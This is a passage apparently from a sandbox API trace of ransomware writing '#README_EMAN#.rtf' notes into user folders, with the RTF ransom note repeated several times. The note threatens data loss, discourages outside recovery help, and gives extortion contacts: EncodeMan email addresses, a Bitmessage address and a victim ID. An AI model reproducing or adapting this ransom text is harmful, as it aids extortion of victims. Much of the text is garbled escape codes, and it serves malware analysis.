ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0300.412] WriteFile (in: hFile=0x2d4, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.413] CloseHandle (hObject=0x2d4) returned 1 [0300.413] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\logs\\personal\\#readme_eman#.rtf")) returned 0xffffffff [0300.413] GetLastError () returned 0x2 [0300.413] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Personal\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\logs\\personal\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.414] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.414] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.414] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that 